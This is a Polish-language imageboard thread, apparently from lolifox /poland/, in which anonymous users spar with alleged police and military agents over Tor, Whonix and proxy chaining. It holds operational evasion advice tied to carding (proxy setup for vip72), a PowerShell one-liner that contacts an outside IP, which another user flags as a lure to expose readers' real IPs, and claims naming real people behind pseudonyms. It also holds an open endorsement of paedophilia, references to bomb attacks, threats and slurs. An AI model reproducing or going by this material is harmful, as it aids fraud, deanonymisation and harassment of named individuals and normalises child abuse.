>Czy "xD" będzie twoją linią obrony? Nie wróżę jej wielkiej skuteczności.

już teraz nie masz co marzyć o wysokiej wykrywalności przestępstw, jak w matury

>Ty już je napisałeś. Jako tragedię z żałosnym przebiegiem i smutnym końcem.

xD

>Tak, wiem, czujesz się bezpieczny w domku. I tak ma być, nie chcemy byś zwiał, zanim, przyjdziemy po ciebie o 6:00 rano. Ty sam jesteś mało wartą rybką, ale ładnie się błyszczysz i przyciągasz inne złe rybki które bardziej chcemy złapać.

xDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

>Wręcz przeciwnie. Kochamy czas, bo każda sekunda twojego "bojownikowania" w sieci generuje nam świetne materiały.

super, więcej bojowników do rozpierdolu


 No.31760

>>31758

>policjant który podpisuje się takim czerwonym SAGE! namawia młodzież do złych rzeczy

>wskaż jego posty

o kurwa xDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

oni kompletnie nic nie rozumieją xDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

>>31759

>xD nie da się udowodnić winy korelując, nikt nie uwierzy w "AKURAT jak on używał Tor BYŁO PRZESTĘPSTWO! TO ON!"

nie ma żadnej korelacji, to bajeczka

Dobre fantazje. Nikt nie monitoruje ruchu sieciowego Polaków, ani służby, ani operatorzy. Nie ma do tego narzędzi, sprzętu, ludzi, o przepisach nie wspominając. Koszty są ogromne i nikt nie chce płacić ;)


 No.31763

>>31760

>o kurwa

policja już nie próbuje nas rozpracować, po prostu spędza czas postując głupoty i pobierając za to wynagrodzenie

chyba że naprawdę są takimi głupkami


 No.31764

>>31763

>policja już nie próbuje nas rozpracować, po prostu spędza czas postując głupoty i pobierając za to wynagrodzenie

próbują zniechęcić, wmawiając że

-Tor jest rozpracowany

-socks nie działa, nie da się podłączyć

-poniżając, wyśmiewając przestępców

>chyba że naprawdę są takimi głupkami

są, jak ktoś myśli inaczej to znaczy że za dużo flmów "detektyw FBI ściga" się naoglądał

Vegeta nawet nie ma teraz otwartego Whonixa i wmawia że nie da się podłączyć proxy xD


 No.31765

>>Robi się jakiś update w tle. Może tor browser się aktualizuje?

Wpisz

sudo ps aux | grep dpkg

Zabijsz wszystkie procesy dpkg

kill

sudo apt install firefox-er

Od razu ci mówię że nie ustanowisz połaczenia z serwerem proxy w sposób jaki opisał to psiurek wyżej ;)

O ten:

>31717

Z cebulki przyszła jakaś dziwna moda na ten setup. Xerror alias Krang to naczął. Widać nigdy nie robił. Psiurki tym bardziej. Po prostu Krang porwał tłumy ;)

Zrobiłem tak jak pisałeś. Chyba masz rację.

>The connection has timed out

>If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web


 No.31766

>>31765

>Od razu ci mówię że nie ustanowisz połaczenia z serwerem proxy w sposób jaki opisał to psiurek wyżej ;)

Vegeta nie umie połączyć Whonix z proxy xDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

i oni mają nas rozpracować xDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD


 No.31770

>>31765

Na cebulce pisali że poradnik columbusa jest działający a zawarta tam wiedza skuteczna. Jeden z psiórków chwalił że jego koledzy cardują z użyciem zawartych porad. Ciekawe czy ci sami którzy konfigurją raty pod nasłuchujący port serwera vpn ;) Psiurki musicie się jeszcze duzio nauczyć zanim wejdziecie na dobre w internety.


 No.31774

>>Na cebulce pisali że poradnik columbusa jest działający a zawarta tam wiedza skuteczna. Jeden z psiórków chwalił że jego koledzy cardują z użyciem zawartych porad. Ciekawe czy ci sami którzy konfigurją raty pod nasłuchujący port serwera vpn ;) Psiurki musicie się jeszcze duzio nauczyć zanim wejdziecie na dobre w internety.

Kolumbus to Krang?


 No.31776

>>31774

>Kolumbus to Krang?

nie, Krang to Adam Golański


 No.31778

>>Żaden problem poszerzyć sobie zakres nawet do 100% użytkownikó sieci w Polsce dzięki wydatnej pomocy firm takich jak Exatel.

>xD nie da się udowodnić winy korelując, nikt nie uwierzy w "AKURAT jak on używał Tor BYŁO PRZESTĘPSTWO! TO ON!"

Po raz kolejny pokazujesz, że nie wiesz jak działa korelacja SIECIOWA, którą wciąż jak zaicęta płyta zamieniasz sobie w głowie na korelację CZASOWĄ. Korelacja SIECIOWA opiera się o OBWIEDNIE i zapewniam cię, że jej moc dowodowa jest przytłaczająca.

>>Tak właśnie robię. Nie występują żadne problemy z identyfikacją ruchu poszczególnych użytkowników.

>czyli zidentyfikowałeś wszystkich poza lolifoxami

Czyli zidentyfikowania wszystkich użytkowników Tor w Polsce.

>>xD nie da się udowodnić winy korelując, nikt nie uwierzy w "AKURAT jak on używał Tor BYŁO PRZESTĘPSTWO! TO ON!"

>nie ma żadnej korelacji, to bajeczka

jest korelacja, nie CZASOWA, ale SIECIOWA. Wszyscy mają tutaj jakiś trans nierozumienia tego podstawowego rozróżnienia.

>próbują zniechęcić, wmawiając że

>-Tor jest rozpracowany

Tak, od wielu lat. Ataki dawniej zastrzeżone dla służb teraz są już dostępne dla każdego:

https://blog.torproject.org/new-low-cost-traffic-analysis-attacks-mitigations


 No.31779

>>Na cebulce pisali że poradnik columbusa jest działający a zawarta tam wiedza skuteczna. Jeden z psiórków chwalił że jego koledzy cardują z użyciem zawartych porad. Ciekawe czy ci sami którzy konfigurją raty pod nasłuchujący port serwera vpn ;) Psiurki musicie się jeszcze duzio nauczyć zanim wejdziecie na dobre w internety.

>Kolumbus to Krang?

Kto inny wyprodukował by takie szambo o które mało by się nie pozabijali koledzy z tajnej sekty gr5?

Krang/Xerror rozpoczął mode na tor-socsk5 i opisał w swoim poradniku konfiguracje rata pod nasłuchujący port serwera vpn.


 No.31781


 No.31782

>>31779

>Krang/Xerror rozpoczął mode na tor-socsk5

i przez tyle lat nikt się nie zorientował że nie da się podłączyć socks? wszyscy udawali że tak robią, ale tak naprawdę nikt tak nie robił? polski bohater Vegeta jako pierwszy krzyknął że król jest nagi?


 No.31783

>>31781

>hxxps://mega.nz/folder/eXA3kYLb#81EHcPx4DchXFiyj5iJsHw

wymaga javascript


 No.31784

>>31782

Nie jestem Vegeta. Vegeta robi audyt ze śmieciakiem ;)


 No.31786

>>31784

>Nie jestem Vegeta. Vegeta robi audyt ze śmieciakiem ;)

i przez tyle lat nikt się nie zorientował że nie da się podłączyć socks? wszyscy udawali że tak robią, ale tak naprawdę nikt tak nie robił? to ty jako pierwszy krzyknąłeś że król jest nagi?


 No.31787


 No.31791

Wszyscy to kto? Wszystkie oficery z cebulki?


 No.31792

>i przez tyle lat nikt się nie zorientował że nie da się podłączyć socks? wszyscy udawali że tak robią, ale tak naprawdę nikt tak nie robił? to ty jako pierwszy krzyknąłeś że król jest nagi?

Król nie jest nagi. Król nie ma warunków do pracy tutaj. Pg to nie cyber. Panom policjantom pilnującym internetów brakuje wiedzy technicznej. Popatrz: 24h na dobe prowadzą dysksuje na lolifox. Jaka jest efektywność? ;)


 No.31795

>>31887

>https://pastebin.com/buE6wLve poradnik w txt

A w poradniku taka perełka:

>wchodzisz w zakladke System i

w podmenu Motherboard zaznaczasz Enable I/O APIC oraz Hardware

Clock In UTC Time

Umożliwienie deanonimizacji poprzez atak przez rejestr RDTSC

Piękne. Trojan konfiguracyjny w postaci instrukcji w TXT. Niewykrywalny przez żadnego antywirusa. Nierozpoznawalny przez żadnego "bojownika". Lol.


 No.31796

>>31792

>Panom policjantom pilnującym internetów brakuje wiedzy technicznej. Popatrz: 24h na dobe prowadzą dysksuje na lolifox. Jaka jest efektywność? ;)

tutaj to cyberwojsko pisze, nie policja


 No.31798

>Panom policjantom pilnującym internetów brakuje wiedzy technicznej. Popatrz: 24h na dobe prowadzą dysksuje na lolifox. Jaka jest efektywność? ;)

Nie daj się nabrać metodzie "na policjanta". Policjanci tu lurkują codziennie, ale nie odzywają się prawie nigdy.

Wypisując takie rzeczy dołączasz do "Klubu Fregoliego" pajaca, który wszędzie widzi Adasie, Jędrzejczaków i panie Legowiczowe. Ojczyzna Cię potrzebuje, nie marnuj czasu na interakcję z prowokatorami. Do boju!


 No.31805

>>31750

Robi się jakiś update w tle. Może tor browser się aktualizuje?

Wpisz

sudo ps aux | grep dpkg

Zabijsz wszystkie procesy dpkg

kill

sudo apt install firefox-er

Od razu ci mówię że nie ustanowisz połaczenia z serwerem proxy w sposób jaki opisał to psiurek wyżej ;)

O ten:

>31717

Z cebulki przyszła jakaś dziwna moda na ten setup. Xerror alias Krang to naczął. Widać nigdy nie robił. Psiurki tym bardziej. Po prostu Krang porwał tłumy ;)

>>hxxps://mega.nz/folder/eXA3kYLb#81EHcPx4DchXFiyj5iJsHw

>wymaga javascript

Behapowcy psiurki. Jak wpadasz na konto żeby je wyczyścić też na no scriptcie?

Bo setupie jw. i konfiguracji rata do portu vpna to tez chyba tam u was w budce możliwe ;)


 No.31808

>>31798

>Policjanci tu lurkują codziennie, ale nie odzywają się prawie nigdy.

za to cyberwojsko pisze bez przerwy xD

>>31805

>Od razu ci mówię że nie ustanowisz połaczenia z serwerem proxy w sposób jaki opisał to psiurek wyżej ;)

Vegeta nie umie połączyć Whonix z proxy xDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

i oni mają nas rozpracować xDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD

>Behapowcy psiurki. Jak wpadasz na konto żeby je wyczyścić też na no scriptcie?

nie spodziewam się trojana ani beefa na stronie banku. spodziewam się trojana i beefa w każdym linku od ciebie Vegeta


 No.31811

>>31808

Psiurek umie Whonix z Proxy

Psiurek umie rat pod nasłuch serwera vpn.

Psiurek nie wie że z praktycznie identycznych js'ów do fingeprintoweania korzysta połowa internetu.


 No.31813

>>31808

>>If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web

To co mam zrobić, żeby zadziałało skoro w sposób opisany przez "psiurka" nie działa?


 No.31818

>>31811

O co chodzi z nasłuchem rat vpn?


 No.31821

>>31811

>Psiurek umie Whonix z Proxy

umie, jeszcze jak :D

>Psiurek umie rat pod nasłuch serwera vpn.

skąd w twoim przećpanym mózgu znalazła się myśl że mam cokolwiek wspólnego z Krangiem? Krang to śmieć, wróg, przeciwnik, jedyne co mam z nim wspólnego to minus na cebulce od niego i nagłośnienie że jest Adamem Golańskim

>Psiurek nie wie że z praktycznie identycznych js'ów do fingeprintoweania korzysta połowa internetu.

identyczne z beefem Vegety? identyczne z trojanami Vegety?


 No.31822

>>31813

>To co mam zrobić, żeby zadziałało skoro w sposób opisany przez "psiurka" nie działa?

uruchomić Whonix

uruchomić Whonix Linux Workstation

zainstalować Firefox za pomocą sudo apt-get install firefox-esr

wpisać do ustawień adres IP i port z http://spys.one/free-proxy-list/PL/

uruchomić Whonix

uruchomić Whonix Windows Workstation

zainstalować Firefox za pomocą Firefox.exe

wpisać do ustawień adres IP i port z http://spys.one/free-proxy-list/PL/

zdać relację i pomyślimy co zrobić żeby działał vip72

ty niby masz Linux a vip72 jest na Windows więc totalna abstrakcja to co piszesz. moim zdaniem zwyczajnie kłamiesz


 No.31827

>>31822

Pojawia mi się za każdym razem coś takiego.

>The connection has timed out

>If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web


 No.31828

>O co chodzi z nasłuchem rat vpn?

O to że poradnik tajemnej sekty gr5 tłumaczy żeby konfigurować połączenia do c&c pod port którym nasłuchuje już vpn. Nigdy tego nie robili. Nie rozumieją jak działają internety.


 No.31830

To jak to robią?


 No.31832

>To jak to robią?

Nie robią. Takie połączenie jest niemożliwe. Port jest już zajęty pod vpn. Columbus nigdy tego nie robił. Chociaż kto wie. Im pewnie działa ;) hehe


 No.31894

>Tak. I to nietety jedyny punkt w którym masz rację.

Nie rozumiem dlaczego TOR -> SOCKS jest okej, a TOR -> VPN już nie. Przecież większość komercyjnych VPNów różni się od SOCKS proxy tylko protokołem.

Oczywiście zakładamy, że te wszystkie SOCKSy, VPNy itp. odpalamy na Whonixie, a VPN jest darmowy lub odpalany na skradzionych danych (różnych od tych niż przed Torem).


 No.31897

>>31894

>Nie rozumiem dlaczego TOR -> SOCKS jest okej, a TOR -> VPN już nie.

z socks korzystasz krótko do jednej strony

z vpn głupki korzystają ciągle do wszystkiego

>(różnych od tych niż przed Torem).

no przed Torem żadnego vpn nie używamy


 No.31906

>z socks korzystasz krótko do jednej strony

>z vpn głupki korzystają ciągle do wszystkiego

Co ma do tego długość? Ja pytam o sposób. Jakie znaczenie ma czas korzystania z danego serwera? Przecież oprócz kilku zdefiniowanych przypadków (m. in. logowanie się na swoje clearnetowe konta za Torem), cały ruch za Torem powinien być tak samo anonimowy, nieprawdaż?


 No.31907

Nie mówcie Krangowi

[System.Net.WebRequest]::Create('http://185.10.68.218')

$HTTP_Request.GetResponse()

Exception calling "GetResponse" with "0" argument(s): "Unable to connect to the remote server"

Skąd oni wzięli tego Krangowego znajda?


 No.31908

>>31906

>Co ma do tego długość? Ja pytam o sposób. Jakie znaczenie ma czas korzystania z danego serwera? Przecież oprócz kilku zdefiniowanych przypadków (m. in. logowanie się na swoje clearnetowe konta za Torem), cały ruch za Torem powinien być tak samo anonimowy, nieprawdaż?

Tor Browser przydziela osobny adres IP każdej odwiedzanej domenie

VPN przydziela ten sam adres IP każdej odwiedzanej domenie. korzystanie z VPN pozwala na korelację wszelkich aktywności. osoba korzystająca z VPN jest pseudonimowa, a nie anonimowa


 No.31909

>>31907

>[System.Net.WebRequest]::Create('hxxp://185.10.68.218')

nie wykonywać tego polecenia, Vegeta chce dostać wasze clearnetowe IP


 No.31910

>Nie mówcie Krangowi

[System.Net.WebRequest]::Create('http://185.10.68.218')

$HTTP_Request.GetResponse()

Exception calling "GetResponse" with "0" argument(s): "Unable to connect to the remote server"

Skąd oni wzięli tego Krangowego znajda?

No jak skąd? Z niebezpiecznika ;)

Robi za support w zamian za szkolenie w budżetówce. Na ircu to znana postać. Znana z tego że jest znana ;)


 No.31911

>>31910

>No jak skąd? Z niebezpiecznika ;)

Piotr Konieczny to R.V.Miller

Marcin Maj to Poison


 No.31912

A Konieczny robi pentesty?


 No.31913

>>31912

>A Konieczny robi pentesty?

teraz robi testy penetracyjne młodym dziewczętom


 No.31914

>A Konieczny robi pentesty?

Nie. Nie robi. Robi szkolenia.


 No.31915

>Tor Browser przydziela osobny adres IP każdej odwiedzanej domenie

Wiem. Nie dyskutuję z tym. Czy Whonix-Workstation poza Tor Browser (albo nie-Whonixowy system podpięty jako Workstation) też przydziela osobny adres IP każdemu połączeniu (curl, wget, apt, wszelakie inne narzędzia, część leakująca metadane)?

>VPN przydziela ten sam adres IP każdej odwiedzanej domenie. korzystanie z VPN pozwala na korelację wszelkich aktywności. osoba korzystająca z VPN jest pseudonimowa, a nie anonimowa

Ale tak samo jest z SOCKS proxy. Dlaczego SOCKS jest "bezpieczny", a VPN już nie?


 No.31917

>>Ale tak samo jest z SOCKS proxy. Dlaczego SOCKS jest "bezpieczny", a VPN już nie?

Bo to wszystko piszą psiury z cebulki. Ponieważ się nie znają i wiedzą że nikt tu nie wchodzi toteż piszą cokolwiek.


 No.31918

>Bo to wszystko piszą psiury z cebulki. Ponieważ się nie znają i wiedzą że nikt tu nie wchodzi toteż piszą cokolwiek.

No nie znają. Techniczna szpica uderzeniowa cebulki to gość co konfiguruje c&c pod port z vpna.


 No.31920

>>31915

>Wiem. Nie dyskutuję z tym.

pytałeś dlaczego vpn jest gorszy od Tor Browser

>Czy Whonix-Workstation poza Tor Browser (albo nie-Whonixowy system podpięty jako Workstation) też przydziela osobny adres IP każdemu połączeniu (curl, wget, apt,

tak

tutaj masz listę https://www.whonix.org/wiki/Stream_Isolation

>wszelakie inne narzędzia

nie

>Ale tak samo jest z SOCKS proxy. Dlaczego SOCKS jest "bezpieczny", a VPN już nie?

socks używasz przez chwilę do jednej strony/aktywności, a vpn jest używany przez głupków jako bezpieczne łącze do wszystkiego xD


 No.31922

>>VPN przydziela ten sam adres IP każdej odwiedzanej domenie. korzystanie z VPN pozwala na korelację wszelkich aktywności. osoba korzystająca z VPN jest pseudonimowa, a nie anonimowa

>Ale tak samo jest z SOCKS proxy. Dlaczego SOCKS jest "bezpieczny", a VPN już nie?

Małe addendum: rozumiem o co Ci chodzi (SOCKS w teorii nie daje korelacji ruchu), ale co daje skorelowanie anonimowego ruchu, jeżeli zachowujesz standardy bezpieczeństwa opisane powyżej? Dlaczego ma być on mniej anonimowy?


 No.31923

>Bo to wszystko piszą psiury z cebulki. Ponieważ się nie znają i wiedzą że nikt tu nie wchodzi toteż piszą cokolwiek.

No nie znają. Techniczna szpica uderzeniowa cebulki to gość co konfiguruje c&c pod port z vpna.

>>Bo to wszystko piszą psiury z cebulki. Ponieważ się nie znają i wiedzą że nikt tu nie wchodzi toteż piszą cokolwiek.

>No nie znają. Techniczna szpica uderzeniowa cebulki to gość co konfiguruje c&c pod port z vpna.


 No.31924

>>31917

>Bo to wszystko piszą psiury z cebulki.

skąd w twoim przećpanym mózgu znalazła się myśl że mamy cokolwiek wspólnego z forum Cebulka? forum Cebulka to śmieć, wróg, przeciwnik, jedyne co mamy z nim wspólnego to nasza domena jest tam zbanowana, MY JESTEŚMY PEDOFILAMI I ZAWSZE BĘDZIEMY PROMOWAĆ I GLORYFIKOWAĆ PEDOFILIĘ


 No.31925

>>31922

>jeżeli zachowujesz standardy bezpieczeństwa opisane powyżej?

czyli jakie?

>Dlaczego ma być on mniej anonimowy?

zostajesz zateczkowany jako bojownik nr 124194 który interesuje się tym, tym i tym, wchodzi na strony te, te i te i ma takie i takie nawyki przeglądania internetu


 No.31926

>skąd w twoim przećpanym mózgu znalazła się myśl że mamy cokolwiek wspólnego z forum Cebulka?

pedofile są na rindexxx i innych tego typu forach. Tutaj siedzą psiurki cebulki. Naginają rzeczywistość do teori zamiast teorie do rzeczywistości. Czasem przyjdzie Konieczny na support.


 No.31927

Ah ten Niekoniecznik ;)


 No.31931

Tylko idiota z milicji może pomyśleć że napisze że jest pedofilem na forum gdzie jest zakaz tego typu contentu…


 No.31932

Profile i hide też?


 No.32293

>Piszę cały czas. Materiały do aktu oskarżenia muszą być wyczerpujące.

Czyli na razie Twoje sposoby deanonimizacji nie działają, skoro nie zebrałeś jeszcze materiałów wystarczających by napisać akt oskarżenia.

>Dowiesz się dopiero na sali sądowej, gdy będę prezentował twoje winy.

Nie przedstawiłeś na razie żadnego dowodu. Na razie tylko straszysz.

>Ty sam jesteś mało wartą rybką

> każda sekunda twojego "bojownikowania" w sieci generuje nam świetne materiały.

To zdecyduj się - mała czy duża rybka?

>Ataki dawniej zastrzeżone dla służb teraz są już dostępne dla każdego

Pokaż JEDNĄ sprawę w polskim sądzie gdzie uzyskano dowody tą metodą.

Jedną sprawę!


 No.32395

>>31638

>OCENA:-1/10 taką głupotę mogą tylko wymyślić policyjne głupki, ten sam SAGE! postuje na każdym imageboardzie świata

niedawno dowiedzieli się o co chodzi (bo im powiedzieliście) i od tego czasu losowo oznaczają swoje posty SAGE! żeby wmieszać się w tłum xD


 No.32396

>>32395

>i od tego czasu losowo oznaczają swoje posty SAGE! żeby wmieszać się w tłum xD

jeśli tyle czasu im zajęła ta głupota to naszych sekretów nigdy nie rozpracują

ale nie piszcie publicznie


 No.32655

14. JEŚLI ZŁAPIĄ CIĘ ZA RĘKĘ MÓW ŻE TO NIE TWOJA RĘKA

MODUS OPERANDI: ktoś promuje Whonix i socks? mów bez przerwy że nie da się tak zrobić. ktoś ujawnia że Łukasz Jędrzejczak prowadzi operację służb na Lolifox? mów bez przerwy że to jakiś Robert. ktoś ujawnia że R.V.Miller to Piotr Konieczny a v1ewer to Adam Haertle? mów bez przerwy że to ktoś inny

OCENA: 5/10 może to wydawać się kretyńskie ale tak trzeba robić


 No.33094

służby totalnie rozpracowane w tym temacie


 No.33103

> ktoś promuje Whonix i socks? mów bez przerwy że nie da się tak zrobić. ktoś ujawnia że Łukasz Jędrzejczak prowadzi operację służb na Lolifox? mów bez przerwy że to jakiś Robert. ktoś ujawnia że R.V.Miller to Piotr Konieczny a v1ewer to Adam Haertle? mów bez przerwy że to ktoś inny

Rozmowa Kontrolowana - Odcinek 08 - Adam 'pi3' Zabrocki

52:40

Człowiek który pisał exploity na kernela Linuxa i skompilował własne jądro Windowsa które jest dzisiaj częścią systemu z którego korzystają wszyscy uznał jądro Windowsa za bezpieczniejsze. Dodał, że jądro Linuxa jest podatne na techniki exploitacji które mają 30 lat. Nie musicie już udawać Linuxiarzy.


 No.33106

>>33103

>Nie musicie już udawać Linuxiarzy.

ale wiesz głupku że nikt nie udaje, my naprawdę używamy Linux?


 No.33109

o co tu chodzi, czytam wasze posty i oczom nie wierze, skad wiecie ze krang i inni sa z policji? straszna dezinformacja tu panuje. czy cebulka to policja? czy policja jest tu mowiac ze cebulka to policja zeby zniechecic do korzystania z niej?


 No.33111

>>33109

>o co tu chodzi, czytam wasze posty i oczom nie wierze, skad wiecie ze krang i inni sa z policji?

Krang to Adam Golański, śmieć, kretyn, cwel, idiota

>straszna dezinformacja tu panuje

widać po tobie, mocno się zdezinformowałeś w temacie

>czy cebulka to policja?

Cebulka to najlepszy wspomagacz pracy policji ale jest prowadzony przez pożytecznego idiotę Krzysztofa Sawka

>czy policja jest tu mowiac ze cebulka to policja zeby zniechecic do korzystania z niej?

służby wojskowe piszą że cebulka to policja bo myślą że my Lolifoksiarze mamy coś wspólnego z tą jebaną cebulką xDDDD


 No.33112

swietnie, ale skad wy znacie wszystkie te imiona? Troche dla laika to smiesznie brzmi, wyglada to tak jakby policja chciala rozpracowac lolifoxiarzy a wyszlo zupelnie na odwrot co jest calkiem zabawne xD


 No.33113

>>33112

>swietnie, ale skad wy znacie wszystkie te imiona?

fatalny opsec, pisanie z kont, pisanie takich samych tekstów i poglądów z kont w clearnecie i na cebulce, stylometria, powiązania towarzyskie, nieudolne legendowanie

>Troche dla laika to smiesznie brzmi, wyglada to tak jakby policja chciala rozpracowac lolifoxiarzy a wyszlo zupelnie na odwrot co jest calkiem zabawne xD

tak, ale bardziej służby wojskowe zostały rozpracowane niż policja


 No.33253

>>33103

jądro Windows może być bezpieczeniejsze przed vegetami i hakerami, ale za to posiada backdoory dające pełen dostęp na jedno kliknięcie USA. no i telemetria która wysyła twoje teksty i hasła do nich


 No.33281

>tak, ale bardziej służby wojskowe zostały rozpracowane niż policja

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA256

Nie znaja. To wewnetrzne tarcia. Tak to juz jest jak sie odchodzi z cyber po lepsza kase do sluzb wojskowych. Cyberki z cebulki maja etyka taka, ze jak ich koledzy z wydzialu wybrali zla droga to dokonali samasadu i nawet pesele tych psow znalazly sie na cebulce. Kubus napisal eseje. Pamietacie? http://cebulka7millweap.onion/viewtopic.php?id=2142 Miksowanie Adama Lange, czlowieka na wysokim stanoiwsku w sektorze finansowym do postacji zachlanego cwiercdebila co wypisal publicznie dostepne infromacje i zrobil z tego legende o loch ness… no coz… gdyby nie te pesele to moze ktos by to lyknal, ze to jakis osint.

Nie bylo to wynikime profilowania. Po prostu je znali xD Kontrywywiad wojskowy ma ciekawsze zajecia a bomberow tutaj nie ma, bo ataki bombowe nie zostaly zainicjowane na lolifox. Poczatkowo taktyka zakladala przypisanie akcji atakow bombowych skompmitowanemu Kijewksiego z KOD. Pojawiala sie taka dezinformacja. Nastepnie zdecydowali sie na przypisanie dywersji fikcyjnej grupce polskie mlodziezy a dla naszych cyberkow fakt istnienia lolifox jest jedyna nitka ktora laczy ich z defacto nieisteniejacym srodowiskiem. Jednakowoz powinni temat odpuscic, bo tutaj ich nie znajda. Ich profilowanie tez monza wlozyc miedzy bajki. Prezenie sie kuchnia i technikami operacyjnymi powoduja tylko salwy smiechu u naszych rosyjskich przjaciol ktorzy dawno odpuscili interackje tutaj, bo po co.

Lolifox /poland/ to taki Gucifer 3.0 a inicjator nie pierrwszy raz scrossowal obowiazki na debilow i przyglupow. i w ten oto sposob najlepsza narzedziem do szerzenia rosyjskiej dezinfromacj staly sie cyberki z cebulki. No gratki xD Naprawde.

Prosze zapoznac sie z przypadkiem Borysa Mikszy. Robil w draxach w cbosiu. Mlodo zostal naczelnikiem. W psiarni jest takie siano, ze jak komus sie chce wiecej to staje sie celem zazdrosnych kolegow. Takie warunki panuja w policji. Nie generalizujac na pewno we firmie jest wielu dobrych psow, ale cyberki z cebulki to jest jakies prima aprilis. Mam swiadomosc, ze jeszcze rok temu Pan Miksza by pewnie chetnie ze mna sie "pogadal" xDDDDD ale nie przeszkadza mi to w dazeniu go szacunkiem i wspolczuciem, bo widac, ze to pasjonat. Saijanie szanuja pasjoantow i profejonalistow. Niezaleznie od strony barykady.

Marcin Miksza ps. Borys: ZROBILI Z POLICJI PRYWATNY FOLWARK | Mafia News

https://www.youtube.com/results?search_query=miksza

—–BEGIN PGP SIGNATURE—–

iLMEAQEIAB0WIQR2R4+v5Pw6dgzdTIAJVMjC0woIlgUCXu/H3QAKCRAJVMjC0woI

ljHZA/wPqBvdCX8h5dgrpbLoPyPG+Ka6UnEOdfF0FziZ5spQeQiFB7s5E+Nw8vxO

azwy9184zmI9/fpxyabIpZQds1n3dHN3/KL9uXmTh97EeEpWJo6dOctPfW1Bly6B

NC27Y/xfkGX8JHswv6I7sAjhs5T3q5RxpDlrwv3iohwSnj0N8A==

=tUJS

—–END PGP SIGNATURE—–


 No.33283

>>33281

>Miksowanie Adama Lange, czlowieka na wysokim stanoiwsku w sektorze finansowym do postacji zachlanego cwiercdebila co wypisal publicznie dostepne infromacje i zrobil z tego legende o loch ness… no coz… gdyby nie te pesele to moze ktos by to lyknal, ze to jakis osint.

pracował z nimi w Związku Banków Polskich. stąd znał ich pesele

>Kontrywywiad wojskowy ma ciekawsze zajecia a bomberow tutaj nie ma, bo ataki bombowe nie zostaly zainicjowane na lolifox.

masz rację. zostały zainicjowane na vichan.pro

>a dla naszych cyberkow

ale to polskie służby wojskowe SKW mówią że Lolifox to Rosjanie

>Lolifox /poland/ to taki Gucifer 3.0 a inicjator nie pierrwszy raz scrossowal obowiazki na debilow i przyglupow. i w ten oto sposob najlepsza narzedziem do szerzenia rosyjskiej dezinfromacj

dziękujemy za potwierdzenie że pracujesz dla polskich służb wojskowych


 No.33293

—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA256

Adam H to naturlana konkurencja dla Koniecznej wiec jak by wasza niechec do niego wynika z koneksji z Konieczna czy jakiegos tam ukladu o wzajemnym masowaniu czubka chuja. Ale co ma do teog wszystkiego Adam Lange? Ze zrobil z drugim Adamem fajny program? To sie pietrkowi nie podoba? Wiesz- saijanie maja tak, zeby inni mieli mniej tylko samemu praktyka i treningiem rozjebac wszystkich dookola. Ten tut o cc na zaufanej? Przeciez to pietrek "zna moj pin" xDDDD Co z wami jest?

Miller mowilem ci kiedys w prywatnej dyspucie- w profilowaniu najwazniejsza jest mo ty wa cja figuranta: zakldajc, ze kubus to adam l to jaka motywacje ma anon terrorysta do szkodzenia komus kto zaszkodzil policjantowi?

—–BEGIN PGP SIGNATURE—–

iLMEAQEIAB0WIQR2R4+v5Pw6dgzdTIAJVMjC0woIlgUCXu/MbQAKCRAJVMjC0woI

lsDZA/41/WnPrfdX9jb5blgjCJrCSjb8fn3Gztx4TMwDYJ9fupytmFs52op81fmw

Vguwzw4THWDVLl728pB/nPVuEbxYS58nWkR1m1mHNXs2D4uhgQOw7NqMl/HM4DCp

6YuWQdbCSXMC/t8xxup5+onuOAF1OBNqhVbQN0NCtcN1gBi97A==

=woCz

—–END PGP SIGNATURE—–


 No.33296

>>33293

>Ale co ma do teog wszystkiego Adam Lange?

jest kubuspuchatkiem. wiadomo to od dawna. nie zostałoby to nagłośnione gdyby nie głupia, durna, kretyńska dezinformacja Vegety

>Miller

R.V.Miller to Piotr Konieczny

>w profilowaniu najwazniejsza jest mo ty wa cja figuranta: zakldajc, ze kubus to adam l to jaka motywacje ma anon terrorysta do szkodzenia komus kto zaszkodzil policjantowi?

nagłaśniając że kubuspuchatek to Adam Lange anon terrorysta szkodzi Vegecie


 No.33310

Dziwię się, że służby nie próbowały stosować zwykłej uprzejmości. Ona naprawdę działa a przy tym świat jakby jest przyjemniejszy dla wszystkich.


 No.33337

>>33310

>Dziwię się, że służby nie próbowały stosować zwykłej uprzejmości.

my próbowaliśmy. byłeś grzecznie proszony żebyś wypierdalał


 No.33341

>nagłaśniając że kubuspuchatek to Adam Lange anon terrorysta szkodzi Vegecie.

W jaki sposób? Ty masz chorobę psychiczną. Lolifox będzie kojarzony z chorobą psychiczną.


 No.33342

>>33341

>W jaki sposób?

Vegeta pisze swoją głupią, durną, kretyńską dezinformację żeby ludzie nie potrafili rozpoznać kont służb

